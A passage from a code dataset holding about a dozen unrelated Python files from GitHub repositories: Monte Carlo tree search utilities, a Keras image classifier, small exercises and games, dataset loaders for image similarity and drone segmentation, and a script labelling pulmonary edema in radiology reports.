\"\"\"Computes the path of action labels from the root to the node.\n\n Returns\n -------\n List[Node]\n Sequence of action labels from the root to the node.\n \"\"\"\n node = self\n path = []\n while node.parent:\n for a in node.parent.children:\n if node.parent.children[a] == node:\n path.append(a)\n break\n node = node.parent\n return reversed(path)\n\n def sequence(self):\n \"\"\"Computes the path from the root to the node.\n\n Returns\n -------\n List[Node]\n A sequence of nodes from the root to the node.\n \"\"\"\n node = self\n path = [node]\n while node.parent:\n path.append(node.parent)\n node = node.parent\n return reversed(path)\n\n @staticmethod\n def all_argmax(x):\n \"\"\"Returns the non-zero elements of a np.ndarray like \n structure which are the row-wise maximum values of that\n structure.\n\n Parameters\n ----------\n x : np.ndarray\n The numpy.array-like structure.\n\n Returns\n -------\n np.ndarray\n The list of indexes of all maximums of `x`.\n \"\"\"\n m = np.amax(x)\n return np.nonzero(x == m)[0]\n\n def random_argmax(self, x):\n \"\"\"Randomly tie-breaking `argmax`.\n \n Parameters\n ----------\n x : np.ndarray\n An array\n\n Returns\n -------\n int\n A random index among the maximums.\n \"\"\"\n indices = Node.all_argmax(x)\n return self.planner.np_random.choice(indices)\n\n def __str__(self):\n return \"{} (n:{}, v:{:.2f})\".format(list(self.path()), self.count, self.get_value())\n\n def __repr__(self):\n return ''.format(id(self))\n\n def get_trajectories(self, full_trajectories=True, include_leaves=True):\n \"\"\"Get a list of visited nodes corresponding to the node subtree.\n\n Parameters\n ----------\n full_trajectories : bool, optional\n Return a list of observation sequences, else a list of observations, by default True\n include_leaves : bool, optional\n Include leaves or only expanded nodes, by default True\n\n Returns\n -------\n List\n The list of trajectories.\n \"\"\"\n trajectories = []\n if self.children:\n for action, child in self.children.items():\n child_trajectories = child.get_trajectories(\n full_trajectories, include_leaves)\n if full_trajectories:\n trajectories.extend(\n [[self] + trajectory for trajectory in child_trajectories])\n else:\n trajectories.extend(child_trajectories)\n if not full_trajectories:\n trajectories.append(self)\n elif include_leaves:\n trajectories = [[self]] if full_trajectories else [self]\n return trajectories\n\n def get_obs_visits(self, state=None):\n \"\"\"Get number of visits given an observation.\n\n Parameters\n ----------\n state : np.ndarray, optional\n The given observation, by default None\n\n Returns\n -------\n Tuple[int, int]\n The number of visits.\n \"\"\"\n visits = defaultdict(int)\n updates = defaultdict(int)\n if hasattr(self, \"observation\"):\n for node in self.get_trajectories(full_trajectories=False,\n include_leaves=False):\n if hasattr(node, \"observation\"):\n visits[str(node.observation)] += 1\n if hasattr(node, \"updates_count\"):\n updates[str(node.observation)] += node.updates_count\n else:\n # Replay required\n for node in self.get_trajectories(full_trajectories=False,\n include_leaves=False):\n replay_state = safe_deepcopy_env(state)\n for action in node.path():\n observation, _, _, _ = replay_state.step(action)\n visits[str(observation)] += 1\n return visits, updates\n","repo_name":"AndreasKaratzas/omniboost-v1","sub_path":"lib/mcts/src/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":7327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"37201125452","text":"import numpy as np\nimport os\nfrom keras.preprocessing import image\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Conv2D\nfrom keras.layers import MaxPooling2D\nfrom keras.layers import Flatten, Activation\nfrom keras.layers.core import Dropout\nfrom keras.layers import LeakyReLU, Dropout\nfrom keras.layers import BatchNormalization\nimport datetime\n\ndropout = 0.4\nclassifier = Sequential()\n\nclassifier.add(Conv2D(64, (3, 3), input_shape=(128, 128, 3)))\nclassifier.add(LeakyReLU(alpha=0.2))\nclassifier.add(MaxPooling2D(pool_size=(2, 2)))\nclassifier.add(Dropout(dropout))\nclassifier.add(Conv2D(64, (3, 3)))\nclassifier.add(LeakyReLU(alpha=0.2))\nclassifier.add(MaxPooling2D(pool_size=(2, 2)))\nclassifier.add(Dropout(dropout))\nclassifier.add(Conv2D(64, (3, 3)))\nclassifier.add(LeakyReLU(alpha=0.2))\nclassifier.add(MaxPooling2D(pool_size=(2, 2)))\nclassifier.add(Dropout(dropout))\nclassifier.add(Conv2D(64, (3, 3)))\nclassifier.add(LeakyReLU(alpha=0.2))\nclassifier.add(MaxPooling2D(pool_size=(2, 2)))\nclassifier.add(Dropout(dropout))\n\nclassifier.add(Flatten())\nclassifier.add(Dropout(0.5))\nclassifier.add(Dense(units=256, activation='relu'))\nclassifier.add(Dropout(0.5))\nclassifier.add(Dense(units=10, activation='sigmoid'))\n\nclassifier.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n\n# Image preprocessing\nfrom keras.preprocessing.image import ImageDataGenerator\n\ntrain_datagen = ImageDataGenerator(\n rescale=1. / 255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True,\n vertical_flip=True,\n rotation_range=90,\n width_shift_range=0.2,\n height_shift_range=0.2)\n\ntest_datagen = ImageDataGenerator(rescale=1. / 255)\n\ntraining_set = train_datagen.flow_from_directory(\n 'training_set/second_attempt',\n target_size=(128, 128),\n batch_size=32,\n class_mode='categorical')\n\ntest_set = test_datagen.flow_from_directory(\n 'test_set/second_attempt',\n target_size=(128, 128),\n batch_size=32,\n class_mode='categorical')\n\nclassifier.fit_generator(training_set, steps_per_epoch=250, epochs=25, validation_data=test_set, validation_steps=65)\n\n# Single classifications to simulate real use case in the Android application\n# product_names array stores the directory names where the test pictures will come from\n# Corresponds to the one hot encoding of the classifier\nproduct_names = ['apple', 'banana', 'cocoa', 'coffee', 'cucumber', 'onion', 'peach', 'potato', 'strawberry', 'tomato']\n# Dictionary to store the number of correct predictions for each class\ncorrect = dict()\nfor name in product_names:\n count = 0\n for img_name in os.listdir('D:\\\\ImageNet\\\\dataset\\\\training_set\\\\second_attempt\\\\' + name + '\\\\testing'):\n test_image = image.load_img(img_name, target_size = (128, 128))\n test_image = image.img_to_array(test_image)\n test_image = np.expand_dims(test_image, axis = 0)\n result = classifier.predict(test_image)\n index = np.where(result==1)\n if index[1] != []:\n count += 1\n correct[name] = count\nprint(correct)","repo_name":"akrstova/cnn-gan-experiments","sub_path":"cnn/single_classifications.py","file_name":"single_classifications.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"72454040540","text":"n= int(input())\nlis = [int(i) for i in input()]\nchanges = 0\nans = 0\n\nfor i in range(n-1, -1, -1):\n if (changes+lis[i])%2 == 1:\n changes += 1\n ans += 1\n\nprint(ans)","repo_name":"AlanBui1/Competitive-Programming-Solutions","sub_path":"fts.py","file_name":"fts.py","file_ext":"py","file_size_in_byte":179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"5659091977","text":"# Ejemplo de como usar cámara móvil Android desde OpenCV\n#\n# Descargar e instalar en Android IP Webcam\n# Configurar la resolución y calidad de video para mejorar la velocidad de transmisión\n# Iniciar servidor\n# Copiar la dirección IP del servicio\n# Modificar la dirección URL en el código\n\n\nimport requests\nimport cv2\nimport numpy as np\n\n \n#Modificar aquí la dirección del servicio\nurl = \"http://192.168.100.65:8080/shot.jpg\"\n \n\nwhile True:\n img_resp = requests.get(url)\n img_arr = np.array(bytearray(img_resp.content), dtype=np.uint8)\n img = cv2.imdecode(img_arr, -1)\n\n # width = int(img.shape[1] * 50 / 100)\n # height = int(img.shape[0] * 50 / 100)\n # dsize = (width, height)\n # output = cv2.resize(img, dsize)\n # cv2.imshow(\"Android_cam\", img)\n\n cv2.imshow(\"Android_cam\", img)\n \n # Press Esc key to exit\n if cv2.waitKey(1) == 27:\n break\n \ncv2.destroyAllWindows()\n","repo_name":"ArturoBL/OpenCV","sub_path":"Python/Basic/WirelessIPCam/WirelessIPCam.py","file_name":"WirelessIPCam.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30669894146","text":"#!/usr/bin/env python \n# _*_ coding:utf-8 _*_ \n# \n# @Version : 1.0 \n# @Time : 08/08/2018 2:25 PM \n# @Author : yanxuewu \n# @File : data_load.py\nimport os\nimport queue\nimport random\nimport threading\nfrom PIL import Image\nimport numpy as np\nfrom data.data_preprocess import batch_process\nclass DataLoader(object):\n\tdef __init__(self, data_path, data_type, distort_types):\n\t\t#super(DataLoader, self).__init__(data_path, data_type, distort_types)\n\t\tself.data_path = data_path\n\t\tself.data_type = data_type\n\t\tself.distort_types = distort_types\n\n\tdef load_data(self, batch_size, shuffle):\n\t\t'''\n\t\tThis method should be implemented by its subclasses\n\t\t:return: a batch of data\n\t\t'''\n\n\t\traise NotImplementedError\n\n\nclass TwoAfcDataLoader(DataLoader):\n\tdef __init__(self, data_path, data_type='train', distort_types=['cnn', 'mix', 'traditional']):\n\t\t'''\n\t\t:param data_path: str, the data stored path\n\t\t:param data_type: str, optional 'train', 'val'\n\t\t:param distort_types: ndarray, ['cnn', 'mix', 'traditional', ...]\n\t\t'''\n\t\tsuper(TwoAfcDataLoader, self).__init__(data_path, data_type, distort_types)\n\n\t\t# distort type paths\n\t\tdistort_paths = []\n\t\tfor distort_type in distort_types:\n\t\t\tdistort_paths.append(os.path.join(data_path, data_type, distort_type))\n\n\t\tinput_paths = []\n\n\t\tele_paths = ['ref', 'p0', 'p1', 'judge']\n\t\tfor path in distort_paths:\n\t\t\tprint('Searching current input path: ', path)\n\t\t\tc_file_names = os.listdir(os.path.join(path, ele_paths[0]))\n\t\t\tfor img_name in c_file_names:\n\t\t\t\tprint('Searching input images: ', img_name)\n\t\t\t\tc_ref_path = os.path.join(path, ele_paths[0], img_name)\n\t\t\t\tc_p0_path = os.path.join(path, ele_paths[1], img_name)\n\t\t\t\tc_p1_path = os.path.join(path, ele_paths[2], img_name)\n\t\t\t\tc_judge_path = os.path.join(path, ele_paths[3], img_name[:-3]+'npy')\n\n\t\t\t\tinput_path_tuple = (c_ref_path, c_p0_path, c_p1_path, c_judge_path)\n\t\t\t\tinput_paths.append(input_path_tuple)\n\n\t\tself.input_paths = input_paths\n\n\tdef load_data(self, batch_size, shuffle=True):\n\t\t'''\n\n\t\t:param batch_size:\n\t\t:return: ndarray with size [batch_size, 4] where [:, 0] is the\n\t\t'''\n\n\t\tinput_queue = queue.Queue(maxsize=5*batch_size)\n\n\t\tdef en_queue():\n\t\t\twhile True:\n\t\t\t\trandom.shuffle(self.input_paths) # Shuffle data in each epoch\n\t\t\t\tfor ele in self.input_paths:\n\t\t\t\t\tinput_queue.put(ele)\n\t\tself.queue_thread = threading.Thread(target=en_queue)\n\t\t# When the major thread is finished, this thread would be killed immediately.\n\t\tself.queue_thread.setDaemon(True)\n\t\tself.queue_thread.start()\n\n\t\tdef convert_paths_to_data(paths):\n\t\t\tc_data = []\n\t\t\tfor one_input_path in paths:\n\t\t\t\t# ndarray\n\t\t\t\tref_img_ = Image.open(one_input_path[0]).convert('RGB')\n\t\t\t\tp0_img_ = Image.open(one_input_path[1]).convert('RGB')\n\t\t\t\tp1_img_ = Image.open(one_input_path[2]).convert('RGB')\n\n\t\t\t\t# Preprocess the input data\n\t\t\t\t# The input data must be in [0, 255]\n\t\t\t\t# process an image object and return a ndarray with shape [H, W, C]\n\t\t\t\tref_img = batch_process(ref_img_)[0]\n\t\t\t\tp0_img = batch_process(p0_img_)[0]\n\t\t\t\tp1_img = batch_process(p1_img_)[0]\n\t\t\t\t# float32\n\t\t\t\tjudge = np.load(one_input_path[3])[0]\n\t\t\t\tc_data.append((ref_img, p0_img, p1_img, judge))\n\t\t\treturn c_data\n\n\t\tbatch_data_path = []\n\t\twhile True:\n\t\t\tfor i in range(batch_size):\n\t\t\t\tbatch_data_path.append(input_queue.get())\n\t\t\t# Convert path to instance\n\t\t\tbatch_data = convert_paths_to_data(batch_data_path)\n\t\t\tyield batch_data\n\t\t\tbatch_data_path = []\n\n\nclass JndDataLoader(DataLoader):\n\tdef __init__(self, data_path, data_type='val', distort_types=['cnn', 'traditional']):\n\t\t'''\n\t\t:param data_path: str, the data stored path\n\t\t:param data_type: str, optional 'train', 'val'\n\t\t:param distort_types: ndarray, ['cnn', 'mix', 'traditional', ...]\n\t\t'''\n\t\tsuper(JndDataLoader, self).__init__(data_path, data_type, distort_types)\n\t\t#TODO\n\n\n\tdef load_data(self, batch_size, shuffle=True):\n\n\t\tprint('This is the jnd data loader implentation')\n\t\t# TODO\n\t\tpass\n\n\nclass TFRecordConverter(object):\n\tdef __init__(self, data_path, data_type='train'):\n\t\tpass\n\n","repo_name":"xuehuachunsheng/PerceptualSimilarity_TF","sub_path":"data/data_load.py","file_name":"data_load.py","file_ext":"py","file_size_in_byte":4006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"26486567553","text":"# програмка принимает у юзера четыре символа сразу и выдает их задом наперед\n\nlist = []\n\nele = input(\"Print any 4 symbols: \")\nfor x in ele: \n list.append(x)\n\ni = 3\nwhile i >= 0:\n print(list[i], end=\"\")\n i = i - 1\n\n \n","repo_name":"dobrodiy555/portfolio","sub_path":"Python programs/Symbols vice versa.py","file_name":"Symbols vice versa.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"21939534184","text":"import time\n\nclass Tamagotchi:\n t = time.time()\n def __init__( self, name, hungry, stamina, energy):\n self.name = name\n self.hungry = hungry\n self.stamina = stamina\n self.energy = energy\n\n def play(self):\n self.stamina += 2\n self.energy -= 1\n\n def feed(self):\n self.stamina += 1\n self.hungry -= 2\n\n def sleep(self):\n self.hungry += 1\n self.energy += 2\n \n def lapse(self):\n t1 = time.time()\n time_ = int( t1 - Tamagotchi.t )\n\n self.stamina -= time_\n self.hungry += time_\n self.energy -= time_\n Tamagotchi.t = t1\n print(f\"Total time : { time_ }\")\n\n def status(self):\n return (f\"Name: {self.name}\\nStatus:\\nHungry: {self.hungry} | Stamina: {self.stamina} | Energy: {self.energy} \") \n\n# Main App\n\nt = Tamagotchi('Tamagotchi 1', 10, 100, 100)\n\nprint(t.status())\nprint(\"Options:\\n1: play\\n2: feed: \\n3: sleep\")\n\noption=int(input(\"Choose one option or press 0 to exit: \"))\n\nwhile option !=0 and t.hungry >= 0 and t.hungry < 100 and t.stamina > 0 and t.energy > 0:\n if option==1:\n t.play()\n elif option==2:\n t.feed()\n elif option==3:\n t.sleep()\n else:\n print(\"Invalid option.\")\n t.lapse()\n print(t.status())\n if t.hungry >= 0 and t.hungry < 100 and t.stamina > 0 and t.energy > 0:\n print(\"Options:\\n1: play\\n2: feed: \\n3: sleep\")\n option=int(input(\"Choose one option or press 0 to exit: \"))\n\nif option != 0:\n print(\"Game Over\")","repo_name":"jhonnierandrey/d-army","sub_path":"python/tamagotchi.py","file_name":"tamagotchi.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"35497631837","text":"'''\nAuthor: your name\nDate: 2022-02-10 20:29:18\nLastEditTime: 2022-02-12 16:38:08\nLastEditors: Please set LastEditors\nDescription: 打开koroFileHeader查看配置 进行设置: https://github.com/OBKoro1/koro1FileHeader/wiki/%E9%85%8D%E7%BD%AE\nFilePath: \\Workspace\\XML\\block4\\task19.py\n'''\n'''\nAuthor: your name\nDate: 2022-02-10 20:29:18\nLastEditTime: 2022-02-12 16:18:27\nLastEditors: Please set LastEditors\nDescription: 打开koroFileHeader查看配置 进行设置: https://github.com/OBKoro1/koro1FileHeader/wiki/%E9%85%8D%E7%BD%AE\nFilePath: \\Workspace\\XML\\block4\\task19.py\n'''\nimport rdflib\nimport owlrl\n\ngraph = rdflib.Graph()\ngraph.parse(\"C:\\\\Users\\\\ydzat\\\\OneDrive\\\\Workspace\\\\XML\\\\block4\\\\Schulpersonal.rdf\")\ngraph.parse(\"C:\\\\Users\\\\ydzat\\\\OneDrive\\\\Workspace\\\\XML\\\\block4\\\\Schulpers.owl\")\nper = rdflib.Namespace(\"http://example.org/personal/per#\")\nowlrl.DeductiveClosure(owlrl.OWLRL_Semantics).expand(graph)\n\nprint(\"Brothers\")\nfor s, o in graph.subject_objects(per.isBrother):\n if not (s == o):\n print(s, \"is brother of\", o)\n","repo_name":"ydzat/Workspace","sub_path":"XML/block4/task19.py","file_name":"task19.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"43744787220","text":"\"\"\"Drone Deploy Dataset - Semantic Segmentation.\"\"\"\nfrom PIL import Image\nimport sys\nimport os\nimport numpy as np\nimport random\nimport cv2\n\nfrom typing import Any, Callable, Optional, Tuple\nfrom .vision import VisionDataset\nfrom earthvision.constants.DroneDeploy.config import (\n train_ids,\n val_ids,\n test_ids,\n LABELMAP,\n INV_LABELMAP,\n)\nfrom earthvision.datasets.utils import _urlretrieve\n\n\nclass DroneDeploy(VisionDataset):\n \"\"\"Drone Deploy Semantic Dataset.\n\n Args:\n root (string): Root directory of dataset.\n dataset_type (string, optional): Choose dataset type.\n data_mode (int): 0 for train data, 1 for validation data, and 2 for testing data\n transform (callable, optional): A function/transform that takes in an PIL image and\n returns a transformed version. E.g, transforms.RandomCrop\n target_transform (callable, optional): A function/transform that takes in the\n target and transforms it.\n download (bool, optional): If true, downloads the dataset from the internet and\n puts it in root directory. If dataset is already downloaded, it is not\n downloaded again.\n\n \"\"\"\n\n resources = {\n \"dataset-sample\": \"https://dl.dropboxusercontent.com/s/h8a8kev0rktf4kq/dataset-sample.tar.gz?dl=0\",\n \"dataset-medium\": \"https://dl.dropboxusercontent.com/s/r0dj9mhyv4bgbme/dataset-medium.tar.gz?dl=0\",\n }\n\n def __init__(\n self,\n root: str,\n dataset_type=\"dataset-sample\",\n data_mode: int = 0,\n transform: Optional[Callable] = None,\n target_transform: Optional[Callable] = None,\n download: bool = False,\n ) -> None:\n\n super(DroneDeploy, self).__init__(\n root, transform=transform, target_transform=target_transform\n )\n\n self.root = root\n self.dataset_type = dataset_type\n self.filename = f\"{dataset_type}.tar.gz\"\n self.filepath = os.path.join(self.root, self.filename)\n self.data_mode = data_mode\n self.label_path = f\"{dataset_type}/label-chips\"\n self.image_path = f\"{dataset_type}/image-chips\"\n\n if download and self._check_exists():\n print(\"file already exists.\")\n\n if download and not self._check_exists():\n self.download()\n\n self.load_dataset()\n\n def download(self) -> None:\n \"\"\"Download a dataset, extract it and create the tiles.\"\"\"\n print(f'Downloading \"{self.dataset_type}\"')\n self.root = os.path.expanduser(self.root)\n fpath = os.path.join(self.root, self.filename)\n _urlretrieve(self.resources[self.dataset_type], fpath)\n\n if not os.path.exists(os.path.join(self.root, self.dataset_type)):\n print(f'Extracting \"{self.filepath}\"')\n os.system(f\"tar -xvf {self.filepath}\")\n os.system(f\"mv {self.dataset_type} {self.root}\")\n else:\n print(f'Folder \"{self.dataset_type}\" already exists.')\n\n image_chips = f\"{self.dataset_type}/image-chips\"\n label_chips = f\"{self.dataset_type}/label-chips\"\n\n if not os.path.exists(image_chips):\n os.mkdir(os.path.join(self.root, image_chips))\n if not os.path.exists(label_chips):\n os.mkdir(os.path.join(self.root, label_chips))\n\n run(os.path.join(self.root, self.dataset_type))\n\n def _check_exists(self) -> bool:\n if self.dataset_type not in self.resources.keys():\n print(f\"Unknown dataset {self.dataset_type}\")\n print(f\"Available dataset : {self.resources.keys()}\")\n sys.exit(0)\n\n if os.path.exists(self.filepath):\n return True\n else:\n return False\n\n def load_dataset(self):\n if self.data_mode == 0:\n list_chip = \"train.txt\"\n elif self.data_mode == 1:\n list_chip = \"valid.txt\"\n elif self.data_mode == 2:\n list_chip = \"test.txt\"\n\n files = [\n f\"{os.path.join(self.root, self.dataset_type)}/image-chips/{fname}\"\n for fname in load_lines(os.path.join(self.root, self.dataset_type, list_chip))\n ]\n self.image_files = files\n\n def __getitem__(self, idx) -> Tuple[Any, Any]:\n \"\"\"\n Args:\n idx (int): Index\n Returns:\n tuple: (img, target) where target is index of the target class.\n \"\"\"\n image_file = self.image_files[idx]\n label_file = image_file.replace(self.image_path, self.label_path)\n\n img = np.array(load_img(image_file))\n target = mask_to_classes(load_img(label_file))\n target = np.array(target)\n\n if self.transform is not None:\n img = Image.fromarray(img)\n img = self.transform(img)\n\n if self.target_transform is not None:\n target = Image.fromarray(target)\n target = self.target_transform(target)\n return img, target\n\n def __len__(self) -> int:\n return len(self.image_files)\n\n def on_epoch_end(self):\n random.shuffle(self.image_files)\n\n\ndef load_lines(fname):\n with open(fname, \"r\") as f:\n return [line.strip() for line in f.readlines()]\n\n\ndef load_img(fname):\n return np.array(Image.open(fname))\n\n\ndef mask_to_classes(mask):\n return to_categorical(mask[:, :, 0], 6)\n\n\ndef to_categorical(y, num_classes=None, dtype=\"float32\"):\n \"\"\"Converts a class vector (integers) to binary class matrix.\n E.g. for use with categorical_crossentropy.\n Args:\n y: class vector to be converted into a matrix\n (integers from 0 to num_classes).\n num_classes: total number of classes. If `None`, this would be inferred\n as the (largest number in `y`) + 1.\n dtype: The data type expected by the input. Default: `'float32'`.\n Returns:\n A binary matrix representation of the input. The classes axis is placed\n last.\n Raises:\n Value Error: If input contains string value\n \"\"\"\n y = np.array(y, dtype=\"int\")\n input_shape = y.shape\n if input_shape and input_shape[-1] == 1 and len(input_shape) > 1:\n input_shape = tuple(input_shape[:-1])\n y = y.ravel()\n if not num_classes:\n num_classes = np.max(y) + 1\n n = y.shape[0]\n categorical = np.zeros((n, num_classes), dtype=dtype)\n categorical[np.arange(n), y] = 1\n output_shape = input_shape + (num_classes,)\n categorical = np.reshape(categorical, output_shape)\n return categorical\n\n\ndef get_split(scene):\n if scene in train_ids:\n return \"train.txt\"\n if scene in val_ids:\n return \"valid.txt\"\n if scene in test_ids:\n return \"test.txt\"\n\n\ndef color2class(orthochip, img):\n ret = np.zeros((img.shape[0], img.shape[1]), dtype=\"uint8\")\n ret = np.dstack([ret, ret, ret])\n colors = np.unique(img.reshape(-1, img.shape[2]), axis=0)\n\n # Skip any chips that would contain magenta (IGNORE) pixels\n seen_colors = set([tuple(color) for color in colors])\n IGNORE_COLOR = LABELMAP[0]\n if IGNORE_COLOR in seen_colors:\n return None, None\n\n for color in colors:\n locs = np.where(\n (img[:, :, 0] == color[0]) & (img[:, :, 1] == color[1]) & (img[:, :, 2] == color[2])\n )\n ret[locs[0], locs[1], :] = INV_LABELMAP[tuple(color)] - 1\n\n return orthochip, ret\n\n\ndef image2tile(\n prefix,\n scene,\n dataset,\n orthofile,\n elevafile,\n labelfile,\n windowx,\n windowy,\n stridex,\n stridey,\n):\n\n ortho = cv2.imread(orthofile)\n label = cv2.imread(labelfile)\n\n assert ortho.shape[0] == label.shape[0]\n assert ortho.shape[1] == label.shape[1]\n\n shape = ortho.shape\n xsize = shape[1]\n ysize = shape[0]\n print(f\"converting {dataset} image {orthofile} {xsize}x{ysize} to chips ...\")\n\n counter = 0\n for xi in range(0, shape[1] - windowx, stridex):\n for yi in range(0, shape[0] - windowy, stridey):\n orthochip = ortho[yi : yi + windowy, xi : xi + windowx, :]\n labelchip = label[yi : yi + windowy, xi : xi + windowx, :]\n\n orthochip, classchip = color2class(orthochip, labelchip)\n\n if classchip is None:\n continue\n\n orthochip_filename = os.path.join(\n prefix, \"image-chips\", scene + \"-\" + str(counter).zfill(6) + \".png\"\n )\n labelchip_filename = os.path.join(\n prefix, \"label-chips\", scene + \"-\" + str(counter).zfill(6) + \".png\"\n )\n\n with open(f\"{prefix}/{dataset}\", mode=\"a\") as fd:\n fd.write(scene + \"-\" + str(counter).zfill(6) + \".png\\n\")\n\n cv2.imwrite(orthochip_filename, orthochip)\n cv2.imwrite(labelchip_filename, classchip)\n counter += 1\n\n\ndef run(prefix, size=300, stride=300):\n lines = [line for line in open(f\"{prefix}/index.csv\")]\n print(\n \"converting images to chips - this may take a few minutes but only needs to be done once.\"\n )\n\n for lineno, line in enumerate(lines):\n line = line.strip().split(\" \")\n scene = line[1]\n dataset = get_split(scene)\n\n orthofile = os.path.join(prefix, \"images\", scene + \"-ortho.tif\")\n elevafile = os.path.join(prefix, \"elevations\", scene + \"-elev.tif\")\n labelfile = os.path.join(prefix, \"labels\", scene + \"-label.png\")\n\n if os.path.exists(orthofile) and os.path.exists(labelfile):\n image2tile(\n prefix,\n scene,\n dataset,\n orthofile,\n elevafile,\n labelfile,\n windowx=size,\n windowy=size,\n stridex=stride,\n stridey=stride,\n )\n","repo_name":"jakartaresearch/earth-vision","sub_path":"earthvision/datasets/drone_deploy.py","file_name":"drone_deploy.py","file_ext":"py","file_size_in_byte":9713,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"69"}
+{"seq_id":"7483565700","text":"mo = ['a','e','i','o','u']\ncount = 0\nprev = \"\"\nwhile True:\n flag=False\n str = input()\n moo = 0\n ja = 0\n if str==\"end\":\n break\n for s in str:\n if s in mo:\n flag=True\n for s in str:\n if s in mo:\n moo+=1\n ja=0\n else:\n ja+=1\n moo=0\n if moo==3 or ja==3:\n flag=False\n for s in str:\n if prev==s:\n if s!=\"e\" or s!=\"o\":\n flag=False\n prev=s\n\n if flag:\n print(f\"<{str}> is acceptable\")\n else:\n print(f\"<{str}> is not acceptable\")\n\n","repo_name":"Doreki/Python","sub_path":"baek_jun/2_week/4659_re.py","file_name":"4659_re.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"20830081276","text":"# \n# Identifies sentences relevant to the diagnosis of pulmonary edema and evaluates performance of algorithm \n# Requires PE_PATH environment variable to be set to root directory of codebase\n#\n\nimport os, sys\nsys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\n\nimport argparse\nimport math\nimport numpy as np \nimport pandas as pd\nimport pprint\nimport re \n\nfrom util.evaluate import evaluate\nfrom util.negation import is_positive\n\nclass CONSTANTS:\n\n noedema_file = os.path.join(os.environ['PE_PATH'], 'keywords', 'no_edema_regex.csv')\n keywords_file = os.path.join(os.environ['PE_PATH'], 'keywords', 'keywords_regex.csv')\n relatedrad_file = os.path.join(os.environ['PE_PATH'], 'keywords', 'related_rad_regex.csv')\n nochange_file = os.path.join(os.environ['PE_PATH'], 'keywords', 'no_change_regex.csv')\n\ndef assign_keyword_label(sentence):\n \"\"\"\n sentence sentence to be labeled \n\n Returns a value indicating the presence/absence of pulmonary edema based on keyword-matching\n - 1.0 pulmonary edema present\n - 0.0 pulmonary edema absent\n - nan no mention of pulmonary edema\n \"\"\" \n # List of keywords indicating no pulmonary edema\n noedema_keywords = pd.read_csv(CONSTANTS.noedema_file)['regex'].tolist()\n # List of keywords related to pulmonary edema \n keywords = pd.read_csv(CONSTANTS.keywords_file)['regex'].tolist()\n \n flag = False \n keyword_label = float('nan')\n # First check if no pulmonary edema is explicitly mentioned \n for key in noedema_keywords:\n if re.search(key, sentence.lower()) is not None:\n flag = True \n keyword_label = 0.0\n\n # Use more general keyword approach to assign mention label \n if not flag:\n keyword_check = is_positive(sentence, keywords)\n if keyword_check is True: keyword_label = 1.0\n elif keyword_check is False: keyword_label = 0.0\n\n return keyword_label \n\ndef assign_related_rad(sentence):\n \"\"\"\n sentence sentence to be labeled \n\n Returns a value indicating the presence/absence of radiologic features related to, but not definitive for, pulmonary edema\n - 1.0 related radiologic feature present\n - 0.0 related radiologic feature absent\n - nan no mention of related radiologic feature\n \"\"\"\n # List of keywords for radiologic features related to pulmonary edema \n keywords = pd.read_csv(CONSTANTS.relatedrad_file)['regex'].tolist()\n\n related_rad_label = float('nan')\n # Check if there is any mention of a radiologic feature \n rad_check = is_positive(sentence, keywords, mode='sum')\n if rad_check is True: related_rad_label = 1.0\n elif rad_check is False: related_rad_label = 0.0\n\n return related_rad_label\n\ndef assign_other_finding(chexpert_row):\n \"\"\"\n chexpert_row output of CheXpert labeler (1, 0, nan) for 14 observations in chest radiographs, represented as a Series \n\n Returns a value indicating the presence/absence of other finding(s) that are not pulmonary edema \n - 1.0 other finding(s) present\n - 0.0 other finding(s) absent\n - nan no mention of other findings\n \"\"\"\n other_finding = float('nan')\n # Columns to ignore \n ignore_labels = set(['Reports', 'Edema', 'Support Devices', 'Enlarged Cardiomediastinum', 'Cardiomegaly', 'Pneumothorax'])\n for col in chexpert_row.index:\n # Skip if column should be ignored or if cell value is empty, e.g. no mention \n if col in ignore_labels or math.isnan(chexpert_row[col]): \n continue \n\n # If no finding is positive, then assume no other findings are present \n elif col == 'No Finding' and chexpert_row[col] == 1.0:\n for other_col in chexpert_row.index:\n if other_col not in ignore_labels.union(set(['Lung Opacity'])) and chexpert_row[other_col] == 0.0:\n other_finding = 0.0 \n\n # Handle 'Lung Opacity' label, which could be indicative of pulmonary edema depending on context\n elif col == 'Lung Opacity':\n # Bilateral opacities are a related radiographic finding for pulmonary edema\n if 'bilateral' in chexpert_row['Reports'] or 'both' in chexpert_row['Reports']:\n continue\n # Unilateral opacities are likely not relevant to pulmonary edema (indicative of other findings)\n elif 'right' in chexpert_row['Reports'] and 'left' not in chexpert_row['Reports']:\n other_finding = abs(chexpert_row[col])\n elif 'left' in chexpert_row['Reports'] and 'right' not in chexpert_row['Reports']:\n other_finding = abs(chexpert_row[col])\n\n # If not a special case, set other finding label equal to cell value \n elif math.isnan(other_finding):\n other_finding = abs(chexpert_row[col])\n\n # If there is positive mention of at least one finding, then other finding label should be 1.0\n else:\n other_finding = max(other_finding, abs(chexpert_row[col]))\n\n return other_finding \n\ndef get_other_finding_mention(chexpert_row):\n ignore_labels = set(['Reports', 'Edema', 'No Finding'])\n for col in chexpert_row.index:\n # Skip if column should be ignored or if cell value is 